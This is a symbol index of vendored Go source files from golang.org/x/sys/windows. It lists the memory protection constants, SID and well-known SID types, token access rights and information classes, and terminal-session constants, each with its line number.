method List (line 246) | func (al *ProcThreadAttributeListContainer) List() *ProcThreadAttributeL... FILE: vendor/golang.org/x/sys/windows/memory_windows.go constant MEM_COMMIT (line 8) | MEM_COMMIT = 0x00001000 constant MEM_RESERVE (line 9) | MEM_RESERVE = 0x00002000 constant MEM_DECOMMIT (line 10) | MEM_DECOMMIT = 0x00004000 constant MEM_RELEASE (line 11) | MEM_RELEASE = 0x00008000 constant MEM_RESET (line 12) | MEM_RESET = 0x00080000 constant MEM_TOP_DOWN (line 13) | MEM_TOP_DOWN = 0x00100000 constant MEM_WRITE_WATCH (line 14) | MEM_WRITE_WATCH = 0x00200000 constant MEM_PHYSICAL (line 15) | MEM_PHYSICAL = 0x00400000 constant MEM_RESET_UNDO (line 16) | MEM_RESET_UNDO = 0x01000000 constant MEM_LARGE_PAGES (line 17) | MEM_LARGE_PAGES = 0x20000000 constant PAGE_NOACCESS (line 19) | PAGE_NOACCESS = 0x00000001 constant PAGE_READONLY (line 20) | PAGE_READONLY = 0x00000002 constant PAGE_READWRITE (line 21) | PAGE_READWRITE = 0x00000004 constant PAGE_WRITECOPY (line 22) | PAGE_WRITECOPY = 0x00000008 constant PAGE_EXECUTE (line 23) | PAGE_EXECUTE = 0x00000010 constant PAGE_EXECUTE_READ (line 24) | PAGE_EXECUTE_READ = 0x00000020 constant PAGE_EXECUTE_READWRITE (line 25) | PAGE_EXECUTE_READWRITE = 0x00000040 constant PAGE_EXECUTE_WRITECOPY (line 26) | PAGE_EXECUTE_WRITECOPY = 0x00000080 constant PAGE_GUARD (line 27) | PAGE_GUARD = 0x00000100 constant PAGE_NOCACHE (line 28) | PAGE_NOCACHE = 0x00000200 constant PAGE_WRITECOMBINE (line 29) | PAGE_WRITECOMBINE = 0x00000400 constant PAGE_TARGETS_INVALID (line 30) | PAGE_TARGETS_INVALID = 0x40000000 constant PAGE_TARGETS_NO_UPDATE (line 31) | PAGE_TARGETS_NO_UPDATE = 0x40000000 constant QUOTA_LIMITS_HARDWS_MIN_DISABLE (line 33) | QUOTA_LIMITS_HARDWS_MIN_DISABLE = 0x00000002 constant QUOTA_LIMITS_HARDWS_MIN_ENABLE (line 34) | QUOTA_LIMITS_HARDWS_MIN_ENABLE = 0x00000001 constant QUOTA_LIMITS_HARDWS_MAX_DISABLE (line 35) | QUOTA_LIMITS_HARDWS_MAX_DISABLE = 0x00000008 constant QUOTA_LIMITS_HARDWS_MAX_ENABLE (line 36) | QUOTA_LIMITS_HARDWS_MAX_ENABLE = 0x00000004 type MemoryBasicInformation (line 39) | type MemoryBasicInformation struct FILE: vendor/golang.org/x/sys/windows/race.go constant raceenabled (line 14) | raceenabled = true function raceAcquire (line 16) | func raceAcquire(addr unsafe.Pointer) { function raceReleaseMerge (line 20) | func raceReleaseMerge(addr unsafe.Pointer) { function raceReadRange (line 24) | func raceReadRange(addr unsafe.Pointer, len int) { function raceWriteRange (line 28) | func raceWriteRange(addr unsafe.Pointer, len int) { FILE: vendor/golang.org/x/sys/windows/race0.go constant raceenabled (line 13) | raceenabled = false function raceAcquire (line 15) | func raceAcquire(addr unsafe.Pointer) { function raceReleaseMerge (line 18) | func raceReleaseMerge(addr unsafe.Pointer) { function raceReadRange (line 21) | func raceReadRange(addr unsafe.Pointer, len int) { function raceWriteRange (line 24) | func raceWriteRange(addr unsafe.Pointer, len int) { FILE: vendor/golang.org/x/sys/windows/security_windows.go constant NameUnknown (line 13) | NameUnknown = 0 constant NameFullyQualifiedDN (line 14) | NameFullyQualifiedDN = 1 constant NameSamCompatible (line 15) | NameSamCompatible = 2 constant NameDisplay (line 16) | NameDisplay = 3 constant NameUniqueId (line 17) | NameUniqueId = 6 constant NameCanonical (line 18) | NameCanonical = 7 constant NameUserPrincipal (line 19) | NameUserPrincipal = 8 constant NameCanonicalEx (line 20) | NameCanonicalEx = 9 constant NameServicePrincipal (line 21) | NameServicePrincipal = 10 constant NameDnsDomain (line 22) | NameDnsDomain = 12 function TranslateAccountName (line 32) | func TranslateAccountName(username string, from, to uint32, initSize int... constant NetSetupUnknownStatus (line 55) | NetSetupUnknownStatus = iota constant NetSetupUnjoined (line 56) | NetSetupUnjoined constant NetSetupWorkgroupName (line 57) | NetSetupWorkgroupName constant NetSetupDomainName (line 58) | NetSetupDomainName type UserInfo10 (line 61) | type UserInfo10 struct constant SidTypeUser (line 74) | SidTypeUser = 1 + iota constant SidTypeGroup (line 75) | SidTypeGroup constant SidTypeDomain (line 76) | SidTypeDomain constant SidTypeAlias (line 77) | SidTypeAlias constant SidTypeWellKnownGroup (line 78) | SidTypeWellKnownGroup constant SidTypeDeletedAccount (line 79) | SidTypeDeletedAccount constant SidTypeInvalid (line 80) | SidTypeInvalid constant SidTypeUnknown (line 81) | SidTypeUnknown constant SidTypeComputer (line 82) | SidTypeComputer constant SidTypeLabel (line 83) | SidTypeLabel type SidIdentifierAuthority (line 86) | type SidIdentifierAuthority struct constant SECURITY_NULL_RID (line 101) | SECURITY_NULL_RID = 0 constant SECURITY_WORLD_RID (line 102) | SECURITY_WORLD_RID = 0 constant SECURITY_LOCAL_RID (line 103) | SECURITY_LOCAL_RID = 0 constant SECURITY_CREATOR_OWNER_RID (line 104) | SECURITY_CREATOR_OWNER_RID = 0 constant SECURITY_CREATOR_GROUP_RID (line 105) | SECURITY_CREATOR_GROUP_RID = 1 constant SECURITY_DIALUP_RID (line 106) | SECURITY_DIALUP_RID = 1 constant SECURITY_NETWORK_RID (line 107) | SECURITY_NETWORK_RID = 2 constant SECURITY_BATCH_RID (line 108) | SECURITY_BATCH_RID = 3 constant SECURITY_INTERACTIVE_RID (line 109) | SECURITY_INTERACTIVE_RID = 4 constant SECURITY_LOGON_IDS_RID (line 110) | SECURITY_LOGON_IDS_RID = 5 constant SECURITY_SERVICE_RID (line 111) | SECURITY_SERVICE_RID = 6 constant SECURITY_LOCAL_SYSTEM_RID (line 112) | SECURITY_LOCAL_SYSTEM_RID = 18 constant SECURITY_BUILTIN_DOMAIN_RID (line 113) | SECURITY_BUILTIN_DOMAIN_RID = 32 constant SECURITY_PRINCIPAL_SELF_RID (line 114) | SECURITY_PRINCIPAL_SELF_RID = 10 constant SECURITY_CREATOR_OWNER_SERVER_RID (line 115) | SECURITY_CREATOR_OWNER_SERVER_RID = 0x2 constant SECURITY_CREATOR_GROUP_SERVER_RID (line 116) | SECURITY_CREATOR_GROUP_SERVER_RID = 0x3 constant SECURITY_LOGON_IDS_RID_COUNT (line 117) | SECURITY_LOGON_IDS_RID_COUNT = 0x3 constant SECURITY_ANONYMOUS_LOGON_RID (line 118) | SECURITY_ANONYMOUS_LOGON_RID = 0x7 constant SECURITY_PROXY_RID (line 119) | SECURITY_PROXY_RID = 0x8 constant SECURITY_ENTERPRISE_CONTROLLERS_RID (line 120) | SECURITY_ENTERPRISE_CONTROLLERS_RID = 0x9 constant SECURITY_SERVER_LOGON_RID (line 121) | SECURITY_SERVER_LOGON_RID = SECURITY_ENTERPRISE_CONTROLLERS_RID constant SECURITY_AUTHENTICATED_USER_RID (line 122) | SECURITY_AUTHENTICATED_USER_RID = 0xb constant SECURITY_RESTRICTED_CODE_RID (line 123) | SECURITY_RESTRICTED_CODE_RID = 0xc constant SECURITY_NT_NON_UNIQUE_RID (line 124) | SECURITY_NT_NON_UNIQUE_RID = 0x15 constant DOMAIN_ALIAS_RID_ADMINS (line 130) | DOMAIN_ALIAS_RID_ADMINS = 0x220 constant DOMAIN_ALIAS_RID_USERS (line 131) | DOMAIN_ALIAS_RID_USERS = 0x221 constant DOMAIN_ALIAS_RID_GUESTS (line 132) | DOMAIN_ALIAS_RID_GUESTS = 0x222 constant DOMAIN_ALIAS_RID_POWER_USERS (line 133) | DOMAIN_ALIAS_RID_POWER_USERS = 0x223 constant DOMAIN_ALIAS_RID_ACCOUNT_OPS (line 134) | DOMAIN_ALIAS_RID_ACCOUNT_OPS = 0x224 constant DOMAIN_ALIAS_RID_SYSTEM_OPS (line 135) | DOMAIN_ALIAS_RID_SYSTEM_OPS = 0x225 constant DOMAIN_ALIAS_RID_PRINT_OPS (line 136) | DOMAIN_ALIAS_RID_PRINT_OPS = 0x226 constant DOMAIN_ALIAS_RID_BACKUP_OPS (line 137) | DOMAIN_ALIAS_RID_BACKUP_OPS = 0x227 constant DOMAIN_ALIAS_RID_REPLICATOR (line 138) | DOMAIN_ALIAS_RID_REPLICATOR = 0x228 constant DOMAIN_ALIAS_RID_RAS_SERVERS (line 139) | DOMAIN_ALIAS_RID_RAS_SERVERS = 0x229 constant DOMAIN_ALIAS_RID_PREW2KCOMPACCESS (line 140) | DOMAIN_ALIAS_RID_PREW2KCOMPACCESS = 0x22a constant DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS (line 141) | DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS = 0x22b constant DOMAIN_ALIAS_RID_NETWORK_CONFIGURATION_OPS (line 142) | DOMAIN_ALIAS_RID_NETWORK_CONFIGURATION_OPS = 0x22c constant DOMAIN_ALIAS_RID_INCOMING_FOREST_TRUST_BUILDERS (line 143) | DOMAIN_ALIAS_RID_INCOMING_FOREST_TRUST_BUILDERS = 0x22d constant DOMAIN_ALIAS_RID_MONITORING_USERS (line 144) | DOMAIN_ALIAS_RID_MONITORING_USERS = 0x22e constant DOMAIN_ALIAS_RID_LOGGING_USERS (line 145) | DOMAIN_ALIAS_RID_LOGGING_USERS = 0x22f constant DOMAIN_ALIAS_RID_AUTHORIZATIONACCESS (line 146) | DOMAIN_ALIAS_RID_AUTHORIZATIONACCESS = 0x230 constant DOMAIN_ALIAS_RID_TS_LICENSE_SERVERS (line 147) | DOMAIN_ALIAS_RID_TS_LICENSE_SERVERS = 0x231 constant DOMAIN_ALIAS_RID_DCOM_USERS (line 148) | DOMAIN_ALIAS_RID_DCOM_USERS = 0x232 constant DOMAIN_ALIAS_RID_IUSERS (line 149) | DOMAIN_ALIAS_RID_IUSERS = 0x238 constant DOMAIN_ALIAS_RID_CRYPTO_OPERATORS (line 150) | DOMAIN_ALIAS_RID_CRYPTO_OPERATORS = 0x239 constant DOMAIN_ALIAS_RID_CACHEABLE_PRINCIPALS_GROUP (line 151) | DOMAIN_ALIAS_RID_CACHEABLE_PRINCIPALS_GROUP = 0x23b constant DOMAIN_ALIAS_RID_NON_CACHEABLE_PRINCIPALS_GROUP (line 152) | DOMAIN_ALIAS_RID_NON_CACHEABLE_PRINCIPALS_GROUP = 0x23c constant DOMAIN_ALIAS_RID_EVENT_LOG_READERS_GROUP (line 153) | DOMAIN_ALIAS_RID_EVENT_LOG_READERS_GROUP = 0x23d constant DOMAIN_ALIAS_RID_CERTSVC_DCOM_ACCESS_GROUP (line 154) | DOMAIN_ALIAS_RID_CERTSVC_DCOM_ACCESS_GROUP = 0x23e type SID (line 175) | type SID struct method String (line 231) | func (sid *SID) String() string { method Len (line 242) | func (sid *SID) Len() int { method Copy (line 247) | func (sid *SID) Copy() (*SID, error) { method IdentifierAuthority (line 258) | func (sid *SID) IdentifierAuthority() SidIdentifierAuthority { method SubAuthorityCount (line 263) | func (sid *SID) SubAuthorityCount() uint8 { method SubAuthority (line 269) | func (sid *SID) SubAuthority(idx uint32) uint32 { method IsValid (line 277) | func (sid *SID) IsValid() bool { method Equals (line 282) | func (sid *SID) Equals(sid2 *SID) bool { method IsWellKnown (line 287) | func (sid *SID) IsWellKnown(sidType WELL_KNOWN_SID_TYPE) bool { method LookupAccount (line 294) | func (sid *SID) LookupAccount(system string) (account, domain string, ... function StringToSid (line 179) | func StringToSid(s string) (*SID, error) { function LookupSID (line 196) | func LookupSID(system, account string) (sid *SID, domain string, accType... type WELL_KNOWN_SID_TYPE (line 321) | type WELL_KNOWN_SID_TYPE constant WinNullSid (line 324) | WinNullSid = 0 constant WinWorldSid (line 325) | WinWorldSid = 1 constant WinLocalSid (line 326) | WinLocalSid = 2 constant WinCreatorOwnerSid (line 327) | WinCreatorOwnerSid = 3 constant WinCreatorGroupSid (line 328) | WinCreatorGroupSid = 4 constant WinCreatorOwnerServerSid (line 329) | WinCreatorOwnerServerSid = 5 constant WinCreatorGroupServerSid (line 330) | WinCreatorGroupServerSid = 6 constant WinNtAuthoritySid (line 331) | WinNtAuthoritySid = 7 constant WinDialupSid (line 332) | WinDialupSid = 8 constant WinNetworkSid (line 333) | WinNetworkSid = 9 constant WinBatchSid (line 334) | WinBatchSid = 10 constant WinInteractiveSid (line 335) | WinInteractiveSid = 11 constant WinServiceSid (line 336) | WinServiceSid = 12 constant WinAnonymousSid (line 337) | WinAnonymousSid = 13 constant WinProxySid (line 338) | WinProxySid = 14 constant WinEnterpriseControllersSid (line 339) | WinEnterpriseControllersSid = 15 constant WinSelfSid (line 340) | WinSelfSid = 16 constant WinAuthenticatedUserSid (line 341) | WinAuthenticatedUserSid = 17 constant WinRestrictedCodeSid (line 342) | WinRestrictedCodeSid = 18 constant WinTerminalServerSid (line 343) | WinTerminalServerSid = 19 constant WinRemoteLogonIdSid (line 344) | WinRemoteLogonIdSid = 20 constant WinLogonIdsSid (line 345) | WinLogonIdsSid = 21 constant WinLocalSystemSid (line 346) | WinLocalSystemSid = 22 constant WinLocalServiceSid (line 347) | WinLocalServiceSid = 23 constant WinNetworkServiceSid (line 348) | WinNetworkServiceSid = 24 constant WinBuiltinDomainSid (line 349) | WinBuiltinDomainSid = 25 constant WinBuiltinAdministratorsSid (line 350) | WinBuiltinAdministratorsSid = 26 constant WinBuiltinUsersSid (line 351) | WinBuiltinUsersSid = 27 constant WinBuiltinGuestsSid (line 352) | WinBuiltinGuestsSid = 28 constant WinBuiltinPowerUsersSid (line 353) | WinBuiltinPowerUsersSid = 29 constant WinBuiltinAccountOperatorsSid (line 354) | WinBuiltinAccountOperatorsSid = 30 constant WinBuiltinSystemOperatorsSid (line 355) | WinBuiltinSystemOperatorsSid = 31 constant WinBuiltinPrintOperatorsSid (line 356) | WinBuiltinPrintOperatorsSid = 32 constant WinBuiltinBackupOperatorsSid (line 357) | WinBuiltinBackupOperatorsSid = 33 constant WinBuiltinReplicatorSid (line 358) | WinBuiltinReplicatorSid = 34 constant WinBuiltinPreWindows2000CompatibleAccessSid (line 359) | WinBuiltinPreWindows2000CompatibleAccessSid = 35 constant WinBuiltinRemoteDesktopUsersSid (line 360) | WinBuiltinRemoteDesktopUsersSid = 36 constant WinBuiltinNetworkConfigurationOperatorsSid (line 361) | WinBuiltinNetworkConfigurationOperatorsSid = 37 constant WinAccountAdministratorSid (line 362) | WinAccountAdministratorSid = 38 constant WinAccountGuestSid (line 363) | WinAccountGuestSid = 39 constant WinAccountKrbtgtSid (line 364) | WinAccountKrbtgtSid = 40 constant WinAccountDomainAdminsSid (line 365) | WinAccountDomainAdminsSid = 41 constant WinAccountDomainUsersSid (line 366) | WinAccountDomainUsersSid = 42 constant WinAccountDomainGuestsSid (line 367) | WinAccountDomainGuestsSid = 43 constant WinAccountComputersSid (line 368) | WinAccountComputersSid = 44 constant WinAccountControllersSid (line 369) | WinAccountControllersSid = 45 constant WinAccountCertAdminsSid (line 370) | WinAccountCertAdminsSid = 46 constant WinAccountSchemaAdminsSid (line 371) | WinAccountSchemaAdminsSid = 47 constant WinAccountEnterpriseAdminsSid (line 372) | WinAccountEnterpriseAdminsSid = 48 constant WinAccountPolicyAdminsSid (line 373) | WinAccountPolicyAdminsSid = 49 constant WinAccountRasAndIasServersSid (line 374) | WinAccountRasAndIasServersSid = 50 constant WinNTLMAuthenticationSid (line 375) | WinNTLMAuthenticationSid = 51 constant WinDigestAuthenticationSid (line 376) | WinDigestAuthenticationSid = 52 constant WinSChannelAuthenticationSid (line 377) | WinSChannelAuthenticationSid = 53 constant WinThisOrganizationSid (line 378) | WinThisOrganizationSid = 54 constant WinOtherOrganizationSid (line 379) | WinOtherOrganizationSid = 55 constant WinBuiltinIncomingForestTrustBuildersSid (line 380) | WinBuiltinIncomingForestTrustBuildersSid = 56 constant WinBuiltinPerfMonitoringUsersSid (line 381) | WinBuiltinPerfMonitoringUsersSid = 57 constant WinBuiltinPerfLoggingUsersSid (line 382) | WinBuiltinPerfLoggingUsersSid = 58 constant WinBuiltinAuthorizationAccessSid (line 383) | WinBuiltinAuthorizationAccessSid = 59 constant WinBuiltinTerminalServerLicenseServersSid (line 384) | WinBuiltinTerminalServerLicenseServersSid = 60 constant WinBuiltinDCOMUsersSid (line 385) | WinBuiltinDCOMUsersSid = 61 constant WinBuiltinIUsersSid (line 386) | WinBuiltinIUsersSid = 62 constant WinIUserSid (line 387) | WinIUserSid = 63 constant WinBuiltinCryptoOperatorsSid (line 388) | WinBuiltinCryptoOperatorsSid = 64 constant WinUntrustedLabelSid (line 389) | WinUntrustedLabelSid = 65 constant WinLowLabelSid (line 390) | WinLowLabelSid = 66 constant WinMediumLabelSid (line 391) | WinMediumLabelSid = 67 constant WinHighLabelSid (line 392) | WinHighLabelSid = 68 constant WinSystemLabelSid (line 393) | WinSystemLabelSid = 69 constant WinWriteRestrictedCodeSid (line 394) | WinWriteRestrictedCodeSid = 70 constant WinCreatorOwnerRightsSid (line 395) | WinCreatorOwnerRightsSid = 71 constant WinCacheablePrincipalsGroupSid (line 396) | WinCacheablePrincipalsGroupSid = 72 constant WinNonCacheablePrincipalsGroupSid (line 397) | WinNonCacheablePrincipalsGroupSid = 73 constant WinEnterpriseReadonlyControllersSid (line 398) | WinEnterpriseReadonlyControllersSid = 74 constant WinAccountReadonlyControllersSid (line 399) | WinAccountReadonlyControllersSid = 75 constant WinBuiltinEventLogReadersGroup (line 400) | WinBuiltinEventLogReadersGroup = 76 constant WinNewEnterpriseReadonlyControllersSid (line 401) | WinNewEnterpriseReadonlyControllersSid = 77 constant WinBuiltinCertSvcDComAccessGroup (line 402) | WinBuiltinCertSvcDComAccessGroup = 78 constant WinMediumPlusLabelSid (line 403) | WinMediumPlusLabelSid = 79 constant WinLocalLogonSid (line 404) | WinLocalLogonSid = 80 constant WinConsoleLogonSid (line 405) | WinConsoleLogonSid = 81 constant WinThisOrganizationCertificateSid (line 406) | WinThisOrganizationCertificateSid = 82 constant WinApplicationPackageAuthoritySid (line 407) | WinApplicationPackageAuthoritySid = 83 constant WinBuiltinAnyPackageSid (line 408) | WinBuiltinAnyPackageSid = 84 constant WinCapabilityInternetClientSid (line 409) | WinCapabilityInternetClientSid = 85 constant WinCapabilityInternetClientServerSid (line 410) | WinCapabilityInternetClientServerSid = 86 constant WinCapabilityPrivateNetworkClientServerSid (line 411) | WinCapabilityPrivateNetworkClientServerSid = 87 constant WinCapabilityPicturesLibrarySid (line 412) | WinCapabilityPicturesLibrarySid = 88 constant WinCapabilityVideosLibrarySid (line 413) | WinCapabilityVideosLibrarySid = 89 constant WinCapabilityMusicLibrarySid (line 414) | WinCapabilityMusicLibrarySid = 90 constant WinCapabilityDocumentsLibrarySid (line 415) | WinCapabilityDocumentsLibrarySid = 91 constant WinCapabilitySharedUserCertificatesSid (line 416) | WinCapabilitySharedUserCertificatesSid = 92 constant WinCapabilityEnterpriseAuthenticationSid (line 417) | WinCapabilityEnterpriseAuthenticationSid = 93 constant WinCapabilityRemovableStorageSid (line 418) | WinCapabilityRemovableStorageSid = 94 constant WinBuiltinRDSRemoteAccessServersSid (line 419) | WinBuiltinRDSRemoteAccessServersSid = 95 constant WinBuiltinRDSEndpointServersSid (line 420) | WinBuiltinRDSEndpointServersSid = 96 constant WinBuiltinRDSManagementServersSid (line 421) | WinBuiltinRDSManagementServersSid = 97 constant WinUserModeDriversSid (line 422) | WinUserModeDriversSid = 98 constant WinBuiltinHyperVAdminsSid (line 423) | WinBuiltinHyperVAdminsSid = 99 constant WinAccountCloneableControllersSid (line 424) | WinAccountCloneableControllersSid = 100 constant WinBuiltinAccessControlAssistanceOperatorsSid (line 425) | WinBuiltinAccessControlAssistanceOperatorsSid = 101 constant WinBuiltinRemoteManagementUsersSid (line 426) | WinBuiltinRemoteManagementUsersSid = 102 constant WinAuthenticationAuthorityAssertedSid (line 427) | WinAuthenticationAuthorityAssertedSid = 103 constant WinAuthenticationServiceAssertedSid (line 428) | WinAuthenticationServiceAssertedSid = 104 constant WinLocalAccountSid (line 429) | WinLocalAccountSid = 105 constant WinLocalAccountAndAdministratorSid (line 430) | WinLocalAccountAndAdministratorSid = 106 constant WinAccountProtectedUsersSid (line 431) | WinAccountProtectedUsersSid = 107 constant WinCapabilityAppointmentsSid (line 432) | WinCapabilityAppointmentsSid = 108 constant WinCapabilityContactsSid (line 433) | WinCapabilityContactsSid = 109 constant WinAccountDefaultSystemManagedSid (line 434) | WinAccountDefaultSystemManagedSid = 110 constant WinBuiltinDefaultSystemManagedGroupSid (line 435) | WinBuiltinDefaultSystemManagedGroupSid = 111 constant WinBuiltinStorageReplicaAdminsSid (line 436) | WinBuiltinStorageReplicaAdminsSid = 112 constant WinAccountKeyAdminsSid (line 437) | WinAccountKeyAdminsSid = 113 constant WinAccountEnterpriseKeyAdminsSid (line 438) | WinAccountEnterpriseKeyAdminsSid = 114 constant WinAuthenticationKeyTrustSid (line 439) | WinAuthenticationKeyTrustSid = 115 constant WinAuthenticationKeyPropertyMFASid (line 440) | WinAuthenticationKeyPropertyMFASid = 116 constant WinAuthenticationKeyPropertyAttestationSid (line 441) | WinAuthenticationKeyPropertyAttestationSid = 117 constant WinAuthenticationFreshKeyAuthSid (line 442) | WinAuthenticationFreshKeyAuthSid = 118 constant WinBuiltinDeviceOwnersSid (line 443) | WinBuiltinDeviceOwnersSid = 119 function CreateWellKnownSid (line 448) | func CreateWellKnownSid(sidType WELL_KNOWN_SID_TYPE) (*SID, error) { function CreateWellKnownDomainSid (line 454) | func CreateWellKnownDomainSid(sidType WELL_KNOWN_SID_TYPE, domainSid *SI... constant TOKEN_ASSIGN_PRIMARY (line 474) | TOKEN_ASSIGN_PRIMARY = 1 << iota constant TOKEN_DUPLICATE (line 475) | TOKEN_DUPLICATE constant TOKEN_IMPERSONATE (line 476) | TOKEN_IMPERSONATE constant TOKEN_QUERY (line 477) | TOKEN_QUERY constant TOKEN_QUERY_SOURCE (line 478) | TOKEN_QUERY_SOURCE constant TOKEN_ADJUST_PRIVILEGES (line 479) | TOKEN_ADJUST_PRIVILEGES constant TOKEN_ADJUST_GROUPS (line 480) | TOKEN_ADJUST_GROUPS constant TOKEN_ADJUST_DEFAULT (line 481) | TOKEN_ADJUST_DEFAULT constant TOKEN_ADJUST_SESSIONID (line 482) | TOKEN_ADJUST_SESSIONID constant TOKEN_ALL_ACCESS (line 484) | TOKEN_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | constant TOKEN_READ (line 494) | TOKEN_READ = STANDARD_RIGHTS_READ | TOKEN_QUERY constant TOKEN_WRITE (line 495) | TOKEN_WRITE = STANDARD_RIGHTS_WRITE | constant TOKEN_EXECUTE (line 499) | TOKEN_EXECUTE = STANDARD_RIGHTS_EXECUTE constant TokenUser (line 504) | TokenUser = 1 + iota constant TokenGroups (line 505) | TokenGroups constant TokenPrivileges (line 506) | TokenPrivileges constant TokenOwner (line 507) | TokenOwner constant TokenPrimaryGroup (line 508) | TokenPrimaryGroup constant TokenDefaultDacl (line 509) | TokenDefaultDacl constant TokenSource (line 510) | TokenSource constant TokenType (line 511) | TokenType constant TokenImpersonationLevel (line 512) | TokenImpersonationLevel constant TokenStatistics (line 513) | TokenStatistics constant TokenRestrictedSids (line 514) | TokenRestrictedSids constant TokenSessionId (line 515) | TokenSessionId constant TokenGroupsAndPrivileges (line 516) | TokenGroupsAndPrivileges constant TokenSessionReference (line 517) | TokenSessionReference constant TokenSandBoxInert (line 518) | TokenSandBoxInert constant TokenAuditPolicy (line 519) | TokenAuditPolicy constant TokenOrigin (line 520) | TokenOrigin constant TokenElevationType (line 521) | TokenElevationType constant TokenLinkedToken (line 522) | TokenLinkedToken constant TokenElevation (line 523) | TokenElevation constant TokenHasRestrictions (line 524) | TokenHasRestrictions constant TokenAccessInformation (line 525) | TokenAccessInformation constant TokenVirtualizationAllowed (line 526) | TokenVirtualizationAllowed constant TokenVirtualizationEnabled (line 527) | TokenVirtualizationEnabled constant TokenIntegrityLevel (line 528) | TokenIntegrityLevel constant TokenUIAccess (line 529) | TokenUIAccess constant TokenMandatoryPolicy (line 530) | TokenMandatoryPolicy constant TokenLogonSid (line 531) | TokenLogonSid constant MaxTokenInfoClass (line 532) | MaxTokenInfoClass constant SE_GROUP_MANDATORY (line 537) | SE_GROUP_MANDATORY = 0x00000001 constant SE_GROUP_ENABLED_BY_DEFAULT (line 538) | SE_GROUP_ENABLED_BY_DEFAULT = 0x00000002 constant SE_GROUP_ENABLED (line 539) | SE_GROUP_ENABLED = 0x00000004 constant SE_GROUP_OWNER (line 540) | SE_GROUP_OWNER = 0x00000008 constant SE_GROUP_USE_FOR_DENY_ONLY (line 541) | SE_GROUP_USE_FOR_DENY_ONLY = 0x00000010 constant SE_GROUP_INTEGRITY (line 542) | SE_GROUP_INTEGRITY = 0x00000020 constant SE_GROUP_INTEGRITY_ENABLED (line 543) | SE_GROUP_INTEGRITY_ENABLED = 0x00000040 constant SE_GROUP_LOGON_ID (line 544) | SE_GROUP_LOGON_ID = 0xC0000000 constant SE_GROUP_RESOURCE (line 545) | SE_GROUP_RESOURCE = 0x20000000 constant SE_GROUP_VALID_ATTRIBUTES (line 546) | SE_GROUP_VALID_ATTRIBUTES = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_D... constant SE_PRIVILEGE_ENABLED_BY_DEFAULT (line 551) | SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001 constant SE_PRIVILEGE_ENABLED (line 552) | SE_PRIVILEGE_ENABLED = 0x00000002 constant SE_PRIVILEGE_REMOVED (line 553) | SE_PRIVILEGE_REMOVED = 0x00000004 constant SE_PRIVILEGE_USED_FOR_ACCESS (line 554) | SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000 constant SE_PRIVILEGE_VALID_ATTRIBUTES (line 555) | SE_PRIVILEGE_VALID_ATTRIBUTES = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_P... constant TokenPrimary (line 560) | TokenPrimary = 1 constant TokenImpersonation (line 561) | TokenImpersonation = 2 constant SecurityAnonymous (line 566) | SecurityAnonymous = 0 constant SecurityIdentification (line 567) | SecurityIdentification = 1 constant SecurityImpersonation (line 568) | SecurityImpersonation = 2 constant SecurityDelegation (line 569) | SecurityDelegation = 3 type LUID (line 572) | type LUID struct type LUIDAndAttributes (line 577) | type LUIDAndAttributes struct type SIDAndAttributes (line 582) | type SIDAndAttributes struct type Tokenuser (line 587) | type Tokenuser struct type Tokenprimarygroup (line 591) | type Tokenprimarygroup struct type Tokengroups (line 595) | type Tokengroups struct method AllGroups (line 601) | func (g *Tokengroups) AllGroups() []SIDAndAttributes { type Tokenprivileges (line 605) | type Tokenprivileges struct method AllPrivileges (line 611) | func (p *Tokenprivileges) AllPrivileges() []LUIDAndAttributes { type Tokenmandatorylabel (line 615) | type Tokenmandatorylabel struct method Size (line 619) | func (tml *Tokenmandatorylabel) Size() uint32 { type Token (line 649) | type Token method Close (line 685) | func (t Token) Close() error { method getInfo (line 690) | func (t Token) getInfo(class uint32, initSize int) (unsafe.Pointer, er... method GetTokenUser (line 708) | func (t Token) GetTokenUser() (*Tokenuser, error) { method GetTokenGroups (line 717) | func (t Token) GetTokenGroups() (*Tokengroups, error) { method GetTokenPrimaryGroup (line 728) | func (t Token) GetTokenPrimaryGroup() (*Tokenprimarygroup, error) { method GetUserProfileDirectory (line 738) | func (t Token) GetUserProfileDirectory() (string, error) { method IsElevated (line 756) | func (token Token) IsElevated() bool { method GetLinkedToken (line 767) | func (token Token) GetLinkedToken() (Token, error) { method IsMember (line 831) | func (t Token) IsMember(sid *SID) (bool, error) { method IsRestricted (line 840) | func (t Token) IsRestricted() (isRestricted bool, err error) { function OpenCurrentProcessToken (line 657) | func OpenCurrentProcessToken() (Token, error) { function GetCurrentProcessToken (line 666) | func GetCurrentProcessToken() Token { function GetCurrentThreadToken (line 673) | func GetCurrentThreadToken() Token { function GetCurrentThreadEffectiveToken (line 680) | func GetCurrentThreadEffectiveToken() Token { function GetSystemDirectory (line 779) | func GetSystemDirectory() (string, error) { function GetWindowsDirectory (line 798) | func GetWindowsDirectory() (string, error) { function GetSystemWindowsDirectory (line 815) | func GetSystemWindowsDirectory() (string, error) { constant WTS_CONSOLE_CONNECT (line 850) | WTS_CONSOLE_CONNECT = 0x1 constant WTS_CONSOLE_DISCONNECT (line 851) | WTS_CONSOLE_DISCONNECT = 0x2 constant WTS_REMOTE_CONNECT (line 852) | WTS_REMOTE_CONNECT = 0x3 constant WTS_REMOTE_DISCONNECT (line 853) | WTS_REMOTE_DISCONNECT = 0x4 constant WTS_SESSION_LOGON (line 854) | WTS_SESSION_LOGON = 0x5 constant WTS_SESSION_LOGOFF (line 855) | WTS_SESSION_LOGOFF = 0x6 constant WTS_SESSION_LOCK (line 856) | WTS_SESSION_LOCK = 0x7 constant WTS_SESSION_UNLOCK (line 857) | WTS_SESSION_UNLOCK = 0x8 constant WTS_SESSION_REMOTE_CONTROL (line 858) | WTS_SESSION_REMOTE_CONTROL = 0x9 constant WTS_SESSION_CREATE (line 859) | WTS_SESSION_CREATE = 0xa constant WTS_SESSION_TERMINATE (line 860) | WTS_SESSION_TERMINATE = 0xb constant WTSActive (line 864) | WTSActive = 0 constant WTSConnected (line 865) | WTSConnected = 1 constant WTSConnectQuery (line 866) | WTSConnectQuery = 2 constant WTSShadow (line 867) | WTSShadow = 3 constant WTSDisconnected (line 868) | WTSDisconnected = 4 constant WTSIdle (line 869) | WTSIdle = 5 constant WTSListen (line 870) | WTSListen = 6 constant WTSReset (line 871) | WTSReset = 7 constant WTSDown (line 872) | WTSDown = 8 